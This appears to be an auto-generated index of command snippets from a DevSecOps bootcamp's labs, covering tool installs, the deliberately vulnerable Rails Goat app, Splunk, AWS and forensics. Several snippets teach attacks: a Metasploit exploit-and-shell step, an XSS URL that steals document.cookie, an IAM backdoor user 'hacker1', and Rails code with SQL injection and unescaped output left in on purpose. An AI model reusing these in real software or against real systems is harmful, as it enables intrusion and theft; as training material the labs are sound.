### Install and Start MariaDB Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-2.md Installs and starts the MariaDB database service on the system. ```bash $ sudo yum -y install mariadb mariadb-server mariadb-devel $ sudo systemctl start mariadb.service ``` -------------------------------- ### Install Vagrant Plugin and Launch VM Source: https://github.com/devsecops/bootcamp/blob/master/Week-1/labs/LAB-3.md Navigate to the bootcamp directory, install the vagrant-vbguest plugin, and start the virtual machine. ```bash cd bootcamp vagrant plugin install vagrant-vbguest vagrant up ``` -------------------------------- ### Install Node.js and MariaDB Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-3.md Installs Node.js and MariaDB server, then starts the MariaDB service. Requires EPEL repository. ```bash sudo rpm -ivh http://dl.fedoraproject.org/pub/epel/7/x86_64/e/epel-release-7-6.noarch.rpm sudo yum -y install nodejs sudo yum -y install mariadb mariadb-server mariadb-devel sudo systemctl start mariadb.service ``` -------------------------------- ### Install Rails and Application Dependencies Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-3.md Installs the Rails gem and then installs all project dependencies using Bundler. ```bash gem install rails --no-ri --no-rdoc rails new myapp cd myapp bundle install ``` -------------------------------- ### Setup Rails Goat Application Source: https://github.com/devsecops/bootcamp/blob/master/Week-3/labs/LAB-2.md Clones the Rails Goat repository, sets the environment to use MySQL, and installs dependencies and database setup. ```shell $ cd ~ $ git clone https://github.com/OWASP/railsgoat.git $ cd railsgoat $ touch log/mysql.log $ export RAILS_ENV=mysql $ bundle install $ bundle exec rake db:setup ``` -------------------------------- ### Install Metasploit Dependencies and Run msfconsole Source: https://github.com/devsecops/bootcamp/blob/master/Week-6/labs/LAB-2.md Installs necessary dependencies for Metasploit and then launches the Metasploit console. Ensure you are in the Metasploit directory. ```bash $ cd metasploit-framework-master $ sudo yum -y install libpcap-devel postgresql-devel libsqlite3-dev sqlite-devel $ bundle install $ ./msfconsole ``` -------------------------------- ### Install Additional Dependencies Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-2.md Installs the 'links' web browser and Node.js. ```bash $ sudo yum -y install links $ sudo yum -y install nodejs ``` -------------------------------- ### Install Application with UserData Script Source: https://github.com/devsecops/bootcamp/blob/master/Week-5/labs/LAB-1.md This script installs necessary packages, sets up services, clones a Rails application, installs its dependencies, and starts the server. It's designed to be embedded within the UserData section of a CloudFormation WebServerInstance resource. ```json "UserData": { "Fn::Base64": { "Fn::Join": [ "", [ "#!/bin/bash -xe\n", "rpm -ivh http://dl.fedoraproject.org/pub/epel/7/x86_64/e/epel-release-7-7.noarch.rpm\n", "yum -y install git git-core zlib zlib-devel gcc-c++ patch readline readline-devel libyaml-devel libffi-devel openssl-devel make bzip2 autoconf automake libtool bison curl sqlite-devel\n", "yum -y install nodejs mariadb mariadb-server mariadb-devel\n", "systemctl enable mariadb.service\n", "systemctl start mariadb.service\n", "rpm -ivh https://s3-us-west-2.amazonaws.com/dso-public-bucket/ruby-2.3.1-1.el7.x86_64.rpm\n", "cd /home/ec2-user\n", "echo \"export GEM_HOME=~/.gem\" >> .bash_profile\n", "echo \"export GEM_PATH=~/.gem\" >> .bash_profile\n", "echo \"export RAILS_ENV=mysql\" >> .bash_profile\n", "echo \"export PATH=~/.gem/bin:$PATH\" >> .bash_profile\n", "su -l -c \"git clone https://github.com/OWASP/railsgoat.git\" ec2-user\n", "su -l -c \"gem install bundler\" ec2-user\n", "su -l -c \"cd railsgoat && bundle install && bundle exec rake db:setup\" ec2-user\n", "su -l -c \"cd railsgoat && bundle exec rails server -b 0.0.0.0 -p 8080 &\" ec2-user\n", "\n" ] ] } } ``` -------------------------------- ### Start Splunk Universal Forwarder Source: https://github.com/devsecops/bootcamp/blob/master/Week-3/labs/LAB-2.md Start the Splunk Universal Forwarder service using the provided command. This command assumes Splunk is installed in the default location. ```bash sudo /opt/splunkforwarder/bin/splunk start ``` -------------------------------- ### Install Ruby and Bundler Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-3.md Installs Ruby version 2.3.1 using rbenv, sets it as the global version, and installs the Bundler gem. ```bash rbenv install -v 2.3.1 rbenv global 2.3.1 ruby -v gem install bundler --no-ri --no-rdoc ``` -------------------------------- ### Run Rails Application Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-3.md Creates and migrates the database, then starts the Rails server, binding it to all network interfaces. ```bash bundle exec rake db:create bundle exec rake db:migrate bundle exec rails server -b 0.0.0.0 ``` -------------------------------- ### Install Restacker Source: https://github.com/devsecops/bootcamp/blob/master/Week-5/labs/LAB-3.md Steps to clone, build, and install the Restacker gem. Ensure rbenv is initialized. ```bash git clone https://github.com/devsecops/restacker.git cd restacker/source gem install bundler bundle install gem build restacker.gemspec gem install restacker-0.0.11.gem rbenv init - ``` -------------------------------- ### Restacker Configuration Example Source: https://github.com/devsecops/bootcamp/blob/master/Week-5/labs/LAB-3.md Example of a Restacker configuration file. Ensure this matches instructor-provided details for region, account numbers, and role names. ```yaml :myapp: :region: us-west-2 :master: :label: control :account_number: '100352119871' :role_name: CTL-my-app-DeploymentAdmin :role_prefix: "/dso/ctrl/my-app/" :target: :label: target :account_number: '717986480831' :role_name: TGT-dso-DeploymentAdmin :role_prefix: "/human/dso/" ``` -------------------------------- ### Install Git on Debian Source: https://github.com/devsecops/bootcamp/blob/master/Week-1/labs/LAB-1.md Install Git on Debian-based systems using apt-get. Update package lists before installation. ```bash sudo apt-get update sudo apt-get install -y git ``` -------------------------------- ### Connect to Vagrant VM Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-2.md Connect to the Vagrant virtual machine to begin the setup process. ```bash $ vagrant ssh ``` -------------------------------- ### Install Ruby using rbenv Source: https://github.com/devsecops/bootcamp/blob/master/Week-3/labs/LAB-2.md Sets up rbenv and ruby-build to manage Ruby versions, then installs and sets Ruby 2.3.1 as the global version. ```shell $ cd $ git clone git://github.com/sstephenson/rbenv.git .rbenv $ echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.bash_profile $ echo 'eval "$(rbenv init -)"' >> ~/.bash_profile $ git clone git://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build $ echo 'export PATH="$HOME/.rbenv/plugins/ruby-build/bin:$PATH"' >> ~/.bash_profile $ source ~/.bash_profile $ rbenv install -v 2.3.1 $ rbenv global 2.3.1 ``` -------------------------------- ### Database Setup for Rails App Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-2.md Creates the database and runs migrations for the Rails application. ```bash $ cd myapp $ bundle exec rake db:create $ bundle exec rake db:migrate ``` -------------------------------- ### Install Git on RHEL/CENTOS Source: https://github.com/devsecops/bootcamp/blob/master/Week-1/labs/LAB-1.md Install Git on RHEL or CentOS systems using yum. Update the system before installing. ```bash sudo yum update -y sudo yum install -y git ``` -------------------------------- ### Install rbenv and ruby-build Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-3.md Installs rbenv for Ruby version management and ruby-build plugin for compiling and installing Ruby versions. ```bash cd git clone git://github.com/sstephenson/rbenv.git .rbenv echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.bash_profile echo 'eval "$(rbenv init -)"' >> ~/.bash_profile git clone git://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build echo 'export PATH="$HOME/.rbenv/plugins/ruby-build/bin:$PATH"' >> ~/.bash_profile source ~/.bash_profile ``` -------------------------------- ### Install Rails Gem Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-2.md Installs the Rails framework gem. ```bash $ gem install rails ``` -------------------------------- ### Install Git on macOS Source: https://github.com/devsecops/bootcamp/blob/master/Week-1/labs/LAB-1.md Use Homebrew to install Git on macOS. Ensure Homebrew is updated before installing. ```bash brew update brew install git ``` -------------------------------- ### Start Rails Goat Application Source: https://github.com/devsecops/bootcamp/blob/master/Week-4/labs/LAB-1.md SSH into the EC2 instance, start Splunk and MariaDB, set the Rails environment, set up the database, and run the Rails server. ```bash $ ssh -i student1.pem ec2-user@54.x.x.x $ sudo /opt/splunkforwarder/bin/splunk start $ sudo systemctl start mariadb.service $ cd ~/railsgoat $ export RAILS_ENV=mysql $ bundle exec rake db:setup $ bundle exec rails server -b 0.0.0.0 -p 8080 ``` -------------------------------- ### Install Bundler Source: https://github.com/devsecops/bootcamp/blob/master/Week-3/labs/LAB-2.md Installs the bundler gem, which manages Ruby application dependencies. It suppresses documentation installation to speed up the process. ```shell $ ruby -v $ gem install bundler --no-ri --no-rdoc ``` -------------------------------- ### Start SSH Agent and Add Key Source: https://github.com/devsecops/bootcamp/blob/master/Week-5/labs/LAB-2.md Loads your SSH key into memory for authentication. If the ssh-agent is not running, start it with `ssh-agent -s` before using `ssh-add`. ```bash ssh-add ~/.ssh/studentx.pem ``` -------------------------------- ### Install Splunk Universal Forwarder Dependencies and Download Source: https://github.com/devsecops/bootcamp/blob/master/Week-3/labs/LAB-2.md Set the timezone to UTC, install wget, and download the Splunk Universal Forwarder RPM package. This is a prerequisite for installing Splunk. ```bash sudo timedatectl set-timezone UTC sudo yum -y install wget wget -O splunkforwarder-6.4.1-debde650d26e-linux-2.6-x86_64.rpm 'https://www.splunk.com/bin/splunk/DownloadActivityServlet?architecture=x86_64&platform=linux&version=6.4.1&product=universalforwarder&filename=splunkforwarder-6.4.1-debde650d26e-linux-2.6-x86_64.rpm&wget=true' ``` -------------------------------- ### Build and Install Selfie Gem Source: https://github.com/devsecops/bootcamp/blob/master/Week-7/labs/LAB-2.md Build the Selfie gem from its source code and then install it. This makes the 'selfie' command available for use. ```bash $ cd selfie $ gem build selfie.gemspec $ gem install selfie-1.0.0.gem ``` -------------------------------- ### Install Git and Development Tools Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-3.md Installs Git and essential development tools required for building Ruby and other dependencies on the EC2 instance. ```bash sudo yum -y install git sudo yum install -y git-core zlib zlib-devel gcc-c++ patch readline readline-devel libyaml-devel libffi-devel openssl-devel make bzip2 autoconf automake libtool bison curl sqlite-devel ``` -------------------------------- ### Install Virtualbox using Homebrew Source: https://github.com/devsecops/bootcamp/blob/master/Week-1/labs/LAB-3.md Installs Virtualbox on macOS using the Homebrew package manager. Ensure Homebrew is installed before running this command. ```bash brew cask install virtualbox ``` -------------------------------- ### Clone Bootcamp Repository and Launch Vagrant VM Source: https://github.com/devsecops/bootcamp/blob/master/Week-1/labs/LAB-3.md Creates a directory for DevOps repositories, clones the bootcamp repository, installs the vagrant-vbguest plugin, and launches the Vagrant virtual machine. This process may take some time to complete. ```bash mkdir $HOME/dso_repos cd $HOME/dso_repos git clone git@github.com:devsecops/bootcamp.git ``` ```bash cd bootcamp vagrant plugin install vagrant-vbguest vagrant up ``` -------------------------------- ### Install Nano Package using Yum Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-1.md Installs the 'nano' text editor package using the 'yum' package manager. Requires root privileges. ```bash yum install nano ``` -------------------------------- ### Run Rails Server Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-2.md Starts the Rails development server, binding to all network interfaces. ```bash $ bundle exec rails server -b 0.0.0.0 ``` -------------------------------- ### Install Nmap Source: https://github.com/devsecops/bootcamp/blob/master/Week-6/labs/LAB-2.md Installs the Nmap network scanner using yum. This is a prerequisite for port scanning. ```bash $ sudo yum -y install nmap ``` -------------------------------- ### AWS IAM Access Key Output Example Source: https://github.com/devsecops/bootcamp/blob/master/Week-6/labs/LAB-3.md Example output showing the generated AccessKeyId and SecretAccessKey for an IAM user. ```json { "AccessKey": { "UserName": "hacker1", "Status": "Active", "CreateDate": "2016-06-30T18:34:48.637Z", "SecretAccessKey": "...", "AccessKeyId": "AKI..." } } ``` -------------------------------- ### Install Splunk Universal Forwarder Source: https://github.com/devsecops/bootcamp/blob/master/Week-5/labs/LAB-3.md Installs the Splunk Universal Forwarder package using yum and wget within the UserData script. ```bash "ln -sf /usr/share/zoneinfo/America/Los_Angeles /etc/localtime\n", "yum -y install wget\n", "cd /opt\n", "wget -O splunkforwarder-6.4.1-debde650d26e-linux-2.6-x86_64.rpm 'https://www.splunk.com/bin/splunk/DownloadActivityServlet?architecture=x86_64&platform=linux&version=6.4.1&product=universalforwarder&filename=splunkforwarder-6.4.1-debde650d26e-linux-2.6-x86_64.rpm&wget=true'\n", "rpm -ivh splunkforwarder-6.4.1-debde650d26e-linux-2.6-x86_64.rpm\n" ``` -------------------------------- ### Execute Lab Guide for Students Source: https://github.com/devsecops/bootcamp/blob/master/Week-1/README.md This Ruby code snippet iterates through each student and executes the lab guide. It's used to initiate hands-on activities. ```ruby Students.each { |student| student.exec lab_guide_3 } ``` -------------------------------- ### Install Homebrew on macOS/Linux Source: https://github.com/devsecops/bootcamp/blob/master/Week-1/labs/LAB-3.md Installs the Homebrew package manager on macOS and Linux systems. This is a prerequisite for installing other tools like Virtualbox and Vagrant. ```bash /usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)" ``` -------------------------------- ### Install Splunk Universal Forwarder Source: https://github.com/devsecops/bootcamp/blob/master/Week-3/labs/LAB-2.md Install the downloaded Splunk Universal Forwarder RPM package using the 'rpm -ivh' command. ```bash sudo rpm -ivh splunkforwarder-6.4.1-debde650d26e-linux-2.6-x86_64.rpm ``` -------------------------------- ### Install Dependencies for Rails Goat Source: https://github.com/devsecops/bootcamp/blob/master/Week-3/labs/LAB-2.md Installs necessary system packages and development tools required for Rails Goat. Ensure you have root privileges. ```shell $ sudo yum -y install git git-core zlib zlib-devel gcc-c++ patch readline readline-devel libyaml-devel libffi-devel openssl-devel make bzip2 autoconf automake libtool bison curl sqlite-devel $ sudo rpm -ivh http://dl.fedoraproject.org/pub/epel/7/x86_64/e/epel-release-7-6.noarch.rpm $ sudo yum -y install nodejs $ sudo yum -y install mariadb mariadb-server mariadb-devel $ sudo systemctl start mariadb.service ``` -------------------------------- ### List Installed Applications on JBoss Source: https://github.com/devsecops/bootcamp/blob/master/Week-7/labs/LAB-3.md Lists the deployed applications within the JBoss web server's work directory. ```bash sudo ls /mnt/student1/jboss/home/ec2-user/jboss-5.1.0.GA/server/default/work/jboss.web/localhost/ ``` -------------------------------- ### Install Net-Tools Package Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-1.md Installs the 'net-tools' package, which provides network diagnostic utilities like ifconfig and netstat. Uses 'yum' with '-y' for automatic confirmation. ```bash sudo yum -y install net-tools ``` -------------------------------- ### Run Rails Goat Server Source: https://github.com/devsecops/bootcamp/blob/master/Week-3/labs/LAB-3.md Commands to SSH into an AWS instance, set the Rails environment, and start the Rails Goat server. Ensure Rails Goat is already set up from a previous lab. ```bash $ vagrant ssh $ export RAILS_ENV=mysql $ bundle exec rails server -b 0.0.0.0 -p 8080 ``` -------------------------------- ### Install Vagrant using Homebrew Source: https://github.com/devsecops/bootcamp/blob/master/Week-1/labs/LAB-3.md Installs Vagrant on macOS using the Homebrew package manager. This tool is used for managing virtual machine environments. ```bash brew cask install vagrant ``` -------------------------------- ### Metasploit msfconsole Prompt Source: https://github.com/devsecops/bootcamp/blob/master/Week-6/labs/LAB-2.md This is the interactive prompt for the Metasploit Framework console after successful installation and launch. ```bash # cowsay++ ____________ < metasploit > ------------ \ ,__, \ (oo)____ (__) ) ||--|| * =[ metasploit v4.12.10-dev ] + -- --=[ 1556 exploits - 902 auxiliary - 268 post ] + -- --=[ 438 payloads - 38 encoders - 8 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] msf > ``` -------------------------------- ### Run Rails Goat Server Source: https://github.com/devsecops/bootcamp/blob/master/Week-3/labs/LAB-2.md Starts the Rails Goat development server, binding to all interfaces on port 8080. Access the application via your instance's public IP address. ```shell bundle exec rails server -b 0.0.0.0 -p 8080 ``` -------------------------------- ### Initialize Git Repository and Push to GitHub Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-2.md Initializes a Git repository, adds a README, makes the first commit, sets the remote origin to a GitHub repository, and pushes the master branch. ```bash echo "# myapp" >> README.md git init git add README.md git commit -m "first commit" git remote add origin https://github.com/YOUR_USERNAME/myapp.git git push -u origin master ``` -------------------------------- ### Navigate and Provision Linux VM Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-1.md Commands to navigate to the project directory, provision, and SSH into a Linux virtual machine. ```bash $ cd ~/dso_repos/bootcamp/ $ # vagrant provision $ # vagrant up $ vagrant ssh ``` -------------------------------- ### Clone Bootcamp Repository Source: https://github.com/devsecops/bootcamp/blob/master/Week-1/labs/LAB-3.md Use these commands in Git Bash to create a directory, navigate into it, and clone the bootcamp repository. ```bash mkdir dso_repos cd dso_repos git clone git@github.com:devsecops/bootcamp.git ``` -------------------------------- ### Monitor Cloud-Init Log Source: https://github.com/devsecops/bootcamp/blob/master/Week-5/labs/LAB-2.md Continuously displays the end of the cloud-init log file to monitor initialization progress. Press Ctrl+C to exit. ```bash tail -f /var/log/cloud-init.log ``` -------------------------------- ### List Key System Directories Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-1.md Lists important system directories like /etc, /home, /var, and /bin with detailed information. ```bash $ ls -ld /etc /home /var /bin ``` -------------------------------- ### Compare Relative and Full Path Listings Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-1.md Demonstrates the difference between listing a directory using a relative path versus a full path. ```bash $ ls -l home $ ls -l /home $ ls -la ``` -------------------------------- ### Generate Scaffold for Bootcamp Model Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-2.md Generates a scaffold for the 'Bootcamp' model with specified attributes and applies database migrations. ```bash $ bundle exec rails generate scaffold Bootcamp name:string description:text dates:string $ bundle exec rake db:migrate ``` -------------------------------- ### List Root Filesystem and Bin Directory Contents Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-1.md Lists the contents of the root directory and the /bin directory to explore the filesystem structure. ```bash $ ls -l / $ ls /bin ``` -------------------------------- ### Download and Unzip Metasploit Source: https://github.com/devsecops/bootcamp/blob/master/Week-6/labs/LAB-2.md Downloads the Metasploit framework from an S3 bucket and unzips the archive. This is an alternative to cloning the Git repository. ```bash $ curl -O https://s3-us-west-2.amazonaws.com/dso-public-bucket/metasploit-framework-master.zip $ unzip metasploit-framework-master.zip ``` -------------------------------- ### List TCP Listening Ports Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-1.md Demonstrates two methods to list TCP ports that are currently in a listening state. ```bash netstat -tulnp | grep LISTEN ``` -------------------------------- ### Create File with Root Privileges using sudo Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-1.md Uses 'sudo' to create a file in the /etc directory, bypassing regular user permission limitations. ```bash $ sudo touch /etc/myfile.txt ``` -------------------------------- ### Exploit Target and Get Shell Source: https://github.com/devsecops/bootcamp/blob/master/Week-6/labs/LAB-2.md Executes the configured Metasploit exploit against the target and obtains a shell connection. ```bash > exploit > shell ``` -------------------------------- ### Gather Instance Configuration Source: https://github.com/devsecops/bootcamp/blob/master/Week-7/LESSON-1.md Use EC2 command-line tools to gather instance configuration details. This is a foundational step for forensic data collection. ```bash aws ec2 describe-instances --region us-east-1 > instance-config.json ``` -------------------------------- ### Count Words Starting with a Specific Letter Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-1.md Filters a word list to count words that begin with a specified letter using grep and wc. ```bash $ grep -e '^g.*' all |wc -l ``` -------------------------------- ### XSS JavaScript Test Code Source: https://github.com/devsecops/bootcamp/blob/master/Week-6/labs/LAB-1.md This is an example of JavaScript code that can be used to test for Cross-Site Scripting (XSS) vulnerabilities. It is typically entered into input fields. ```javascript ``` -------------------------------- ### SSH into Bastion Host Source: https://github.com/devsecops/bootcamp/blob/master/Week-7/labs/LAB-3.md Connect to the bastion host using SSH. Replace with your actual student identifier. ```bash ssh @52.42.52.211 ``` -------------------------------- ### Extract Command Injection with rex Source: https://github.com/devsecops/bootcamp/blob/master/Week-4/labs/LAB-3.md Use the rex command to extract the injected command from log events into a field named 'cmd'. This example demonstrates basic field extraction. ```splunk index=main host= source="/home/ec2-user/railsgoat/log/mysql.log" filename="*" | rex " filename=(?.*) . *" | rex field=cmd "s/+/ /g" ``` -------------------------------- ### Selfie Command Usage Source: https://github.com/devsecops/bootcamp/blob/master/Week-7/labs/LAB-2.md Displays the available options and usage instructions for the Selfie command-line tool. Use this to understand how to configure and run Selfie. ```bash $ selfie Usage: selfie [options] -r, --region REGION AWS Region (default: us-west-2) -a, --target-account ACCOUNT Target AWS account to snapshot, without dashes -R, --target-role ROLE Incident response target account role name -n INSTANCEID, Comma-separated list of instances to snapshot --target-instance-list -i, --ir ACCOUNT The incident response (IR) account to copy snapshots into -A, --control-account ACCOUNT The control plane account number -c, --control-role ROLE Incident response control account role name -u, --username USERNAME Your IAM username, used to grab MFA serial number -t, --ticket-id TICKETID The ticket ID, will be added to snapshot description -f, --file-path FILEPATH The file path to load and resume from -p, --profile-name NAME The AWS credentials profile name -b, --bucket BUCKET The bucket in incident response account for saving security configuration -h, --help Show this message --version Show version ``` -------------------------------- ### SSH into Vagrant Virtual Machine Source: https://github.com/devsecops/bootcamp/blob/master/Week-1/labs/LAB-3.md Connects to the Vagrant virtual machine via SSH. If AWS configuration is missing, running 'vagrant provision' may resolve the issue by executing additional setup commands. ```bash vagrant ssh ``` ```bash vagrant provision ``` -------------------------------- ### Download, Decompress, and Count Words Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-1.md Demonstrates downloading a compressed word list, organizing it into a directory, decompressing, and counting the total words. ```bash $ wget http://download.openwall.net/pub/wordlists/all.gz $ mkdir words $ mv all.gz words/ $ cd words $ gunzip all.gz $ ls -l $ wc -l all ``` -------------------------------- ### Automate AWS Role Assumption Source: https://github.com/devsecops/bootcamp/blob/master/Week-3/ASSIGNMENTS.md Use the 'assumer' gem to automate assuming an AWS role into a target account and opening the AWS Console UI. Ensure the 'assumer' gem is installed and necessary AWS credentials/variables are configured. ```bash assumer -a 717986480831 -r human/dso/TGT-dso-DeploymentAdmin -A 100352119871 -R dso/ctrl/my-app/CTL-my-app-DeploymentAdmin -o dso -g -u $AWS_USERNAME ``` -------------------------------- ### XSS Attack URL Example Source: https://github.com/devsecops/bootcamp/blob/master/Week-6/labs/LAB-1.md This URL demonstrates an XSS attack by embedding JavaScript within the 'url' parameter. It is designed to execute an alert box showing document cookies. Note that browser compatibility may vary. ```url http://127.0.0.1/?url=%2Fdashboard%2Fhome#test=%3Cscript%3Ealert(document.cookie)%3C/script%3E ``` -------------------------------- ### Configure UserData for Proxy Support Source: https://github.com/devsecops/bootcamp/blob/master/Week-5/labs/LAB-2.md Add export commands for http_proxy and https_proxy to the UserData script. Ensure these variables are loaded on login by appending them to .bash_profile and configuring git. ```bash #!/bin/bash -xe export http_proxy=http://proxy:3128 export https_proxy=http://proxy:3128 rpm -ivh https://dl.fedoraproject.org/pub/epel/7/x86_64/e/epel-release-7-7.noarch.rpm yum -y install git git-core zlib zlib-devel gcc-c++ patch readline readline-devel libyaml-devel libffi-devel openssl-devel make bzip2 autoconf automake libtool bison curl sqlite-devel yum -y install nodejs mariadb mariadb-server mariadb-devel systemctl enable mariadb.service systemctl start mariadb.service rpm -ivh https://s3-us-west-2.amazonaws.com/dso-public-bucket/ruby-2.3.1-1.el7.x86_64.rpm cd /home/ec2-user echo "export GEM_HOME=~/.gem" >> .bash_profile echo "export GEM_PATH=~/.gem" >> .bash_profile echo "export RAILS_ENV=mysql" >> .bash_profile echo "export PATH=~/.gem/bin:$PATH" >> .bash_profile echo "export http_proxy=http://proxy:3128" >> .bash_profile echo "export https_proxy=http://proxy:3128" >> .bash_profile echo "export no_proxy=localhost,127.0.0.1,254.169.254.169" >> .bash_profile echo "[http] proxy = $http_proxy" >> .gitconfig chown ec2-user: .gitconfig su -l -c "git clone https://github.com/OWASP/railsgoat.git" ec2-user su -l -c "gem install bundler" ec2-user su -l -c "cd railsgoat && bundle install && bundle exec rake db:setup" ec2-user su -l -c "cd railsgoat && bundle exec rails server -b 0.0.0.0 -p 8080 &" ec2-user ``` -------------------------------- ### Attempt to Create File as Non-Privileged User Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-1.md Tries to create a file in the /etc directory as a regular user to demonstrate permission restrictions. ```bash $ touch /etc/myfile.txt ``` -------------------------------- ### Create New Rails Application Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-2.md Creates a new Rails application named 'myapp' with specific configurations, including MySQL database support and skipping certain Rails features. ```bash $ rails new --skip-turbolinks --skip-spring \ --skip-test-unit -d mysql \ myapp ``` -------------------------------- ### Create AWS IAM Access Keys Source: https://github.com/devsecops/bootcamp/blob/master/Week-6/labs/LAB-3.md Create API access keys for the newly created IAM user. ```bash $ aws iam create-access-key --user-name hacker1 ``` -------------------------------- ### Upload Configuration to S3 Source: https://github.com/devsecops/bootcamp/blob/master/Week-7/LESSON-1.md Upload collected configuration files to an S3 bucket for secure storage and analysis. ```bash aws s3 cp instance-config.json s3://your-forensic-bucket/instance-config.json aws s3 cp iam-users.json s3://your-forensic-bucket/iam-users.json aws s3 cp iam-roles.json s3://your-forensic-bucket/iam-roles.json aws s3 cp iam-policies.json s3://your-forensic-bucket/iam-policies.json ``` -------------------------------- ### Check Current User and List Files Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-1.md Commands to determine the current logged-in user and list files in the home directory with all details. ```bash $ whoami $ ls -la ``` -------------------------------- ### Display Raw Description in View Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-2.md Modifies the show view for bootcamps to render the description field using the `raw` helper, which bypasses HTML escaping. ```erb

Description: <%=raw @bootcamp.description %>

``` -------------------------------- ### Verify AWS CLI Configuration Source: https://github.com/devsecops/bootcamp/blob/master/Week-1/ASSIGNMENTS.md Run this command to verify that your AWS CLI is configured correctly and can connect to the AWS API. It should return an empty table if successful. ```bash aws ec2 describe-instances --output table --region us-west-2 ``` -------------------------------- ### Configure Splunk Inputs Source: https://github.com/devsecops/bootcamp/blob/master/Week-3/labs/LAB-2.md Configure Splunk Universal Forwarder to monitor log directories for new data. It includes settings for the default host and monitoring specific log paths. ```bash echo "[default] host = \$decideOnStartup [monitor:///home/ec2-user/railsgoat/log/] recursive=true [monitor:///var/log/] recursive=true" | sudo tee /opt/splunkforwarder/etc/system/local/inputs.conf ``` -------------------------------- ### Inspect File Permissions Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-1.md Shows detailed information about the 'ls' command file, including its permissions, owner, and size. ```bash $ ls -l /bin/ls -rwxr-xr-x. 1 root root 117616 Feb 16 10:49 /bin/ls ``` -------------------------------- ### Lab 1 Outline Source: https://github.com/devsecops/bootcamp/blob/master/Week-8/LESSON-1.md This snippet outlines the general structure or steps for Lab 1. ```text * * * * * ``` -------------------------------- ### Log in to AWS with Assumer Source: https://github.com/devsecops/bootcamp/blob/master/Week-4/labs/LAB-1.md Use the 'assumer' tool to log into the target AWS account. Ensure the AWS_USERNAME environment variable is set to your student ID. ```bash $ unset AWS_SESSION_TOKEN AWS_SECRET_ACCESS_KEY AWS_ACCESS_KEY_ID $ assumer -a 717986480831 -r human/dso/TGT-dso-DeploymentAdmin \ -A 100352119871 -R dso/ctrl/my-app/CTL-my-app-DeploymentAdmin \ -o dso -g -u $AWS_USERNAME ``` -------------------------------- ### Configure AWS CLI Source: https://github.com/devsecops/bootcamp/blob/master/Week-1/labs/LAB-3.md This command initiates the AWS CLI configuration process. It prompts for access key ID, secret access key, default region, and output format. ```bash aws configure ``` -------------------------------- ### List Partitions on Attached Disk Source: https://github.com/devsecops/bootcamp/blob/master/Week-7/labs/LAB-3.md Use fdisk to list partitions on a newly attached disk. Replace with the appropriate device ID for the disk (e.g., /dev/xvdf). ```bash sudo fdisk -l ``` -------------------------------- ### Display System Usernames Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-1.md Shows the contents of the /etc/passwd file, which contains user account information. ```bash $ cat /etc/passwd ``` -------------------------------- ### Configure Splunk Outputs Source: https://github.com/devsecops/bootcamp/blob/master/Week-3/labs/LAB-2.md Configure Splunk Universal Forwarder to send data to a specified server and port. This includes settings for SSL and server certificate verification. ```bash echo "[tcpout] defaultGroup = dso-autolb-group [tcpout:dso-autolb-group] disabled = false dropEventsOnQueueFull = 10 server = appliance:9997 sslCertPath = \$SPLUNK_HOME/etc/auth/server.pem sslPassword = password sslRootCAPath = \$SPLUNK_HOME/etc/auth/cacert.pem sslVerifyServerCert = false useACK = false" | sudo tee /opt/splunkforwarder/etc/system/local/outputs.conf ``` -------------------------------- ### SSH into Bastion Instance Source: https://github.com/devsecops/bootcamp/blob/master/Week-5/labs/LAB-2.md Connects to the bastion instance using SSH with agent forwarding enabled. Use `-A` to pass your SSH key. Verify key presence with `ssh-add -l`. ```bash ssh -A student1@52.x.x.x ``` -------------------------------- ### Implement Search in Index Action Source: https://github.com/devsecops/bootcamp/blob/master/Week-2/labs/LAB-2.md Adds search functionality to the `index` action of the `bootcamps` controller. It filters bootcamps by name if a search parameter is provided. ```ruby def index @bootcamps = Bootcamp.all if params[:search].to_s != '' @bootcamps = Bootcamp.where("name LIKE '%#{params[:search]}%'”) else @bootcamps = Bootcamp.all end end ``` -------------------------------- ### Trace Execution of a Custom Binary Source: https://github.com/devsecops/bootcamp/blob/master/Week-7/labs/LAB-3.md Uses `strace` to trace the system calls made by a custom binary, revealing its behavior such as opening network ports. ```bash strace /mnt//jenkins/tmp/si8xE3 ``` -------------------------------- ### SSH into Application Instance Source: https://github.com/devsecops/bootcamp/blob/master/Week-5/labs/LAB-2.md Connects to the application 